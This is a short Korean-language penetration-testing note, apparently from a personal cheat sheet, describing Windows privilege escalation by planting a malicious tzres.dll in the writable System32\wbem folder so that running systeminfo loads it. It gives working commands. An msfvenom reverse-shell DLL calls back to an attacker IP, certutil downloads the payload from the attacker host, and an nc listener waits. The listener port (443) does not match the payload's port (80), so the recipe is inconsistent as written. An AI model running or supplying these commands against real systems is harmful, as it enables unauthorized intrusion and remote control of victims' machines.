C:\\Windows\\System32\\wbem 폴더에 일반 사용자의 쓰기 권한이 가능하다면 악성코드가 담긴 tzres.dll 파일을 해당 경로로 옮긴 후 systeminfo 를 실행해 악성코드를 실행시킬 수 있다.
tzres.dll (Time Zone Resource Library) 는 윈도우의 많은 실행 파일이 필요한 리소스 정보를 담고 있다.systeminfo.exe 같은 윈도우 도구들은 시스템 정보를 수집하기 위해 WMI 라이브러리를 호출하는데, 이때 wbem 폴더는 시스템이 DLL을 찾는 주요 경로 중 하나로 포함되는 경우가 많다.# in attacker host
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.236 LPORT=80 -f dll -o tzres.dll
# Transfer to target host
cd C:\\windows\\System32\\wbem
certutil -urlcache -split -f <http://$IP/tzres.dll> tzres.dll
# Listener in attacker host
rlwrap nc -lvnp 443
# Execute
systeminfo